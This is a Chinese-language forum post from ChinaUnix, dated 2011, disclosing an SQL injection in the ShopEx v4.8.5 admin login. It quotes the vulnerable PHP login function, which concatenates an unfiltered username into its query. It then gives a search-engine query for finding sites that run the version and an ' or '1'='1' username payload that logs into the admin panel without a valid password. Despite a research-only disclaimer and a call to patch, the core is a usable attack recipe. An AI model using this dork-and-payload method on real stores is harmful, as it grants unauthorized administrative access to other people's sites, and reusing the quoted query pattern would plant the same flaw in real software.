免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 2468 | 回复: 0
打印 上一主题 下一主题

shopex v4.8.5 最新漏洞 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2011-12-23 02:21 |只看该作者 |倒序浏览

shopex v4.8.5 漏洞

本人声明:

只做技术研究,请勿破坏….谢谢.

漏洞原因:

直接看代码:
public function tryLogin( $aValue, $issuper = false )
{
if ( $aValue['passwd'] == “+_-_-_+” )
{
$aValue['passwd'] = “”;
}
$sql = “SELECT * FROM sdb_operators WHERE username = ‘{$aValue['usrname']}’ AND userpass = ‘”.md5( $aValue['passwd'] ).”‘ AND disabled=’false’”;
if ( $issuper )
{
$sql .= ” AND super=’1′”;
}
return $this->db->selectrow( $sql );
}

这里$aValue['usrname']没有任何过滤直接查询(没想到shopex还爆这种低级漏洞)。

利用方法:

在baidu,google直接搜索 Powered by ShopEx v4.8.5

直接在后台登陆 用户名的地方输入

‘ or ’1′=’1′ or ’1′=’1

密码随便输,验证码输正确,直接进入后台。

SQL查询语句就变成这个样子了直接通过
SELECT * FROM sdb_operators WHERE username = ” or ’1′=’1′ or ’1′=’1′ AND userpass = ‘x’ AND disabled=’false’

看到此文章的shopex用户赶紧打官方的最新补丁….

您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP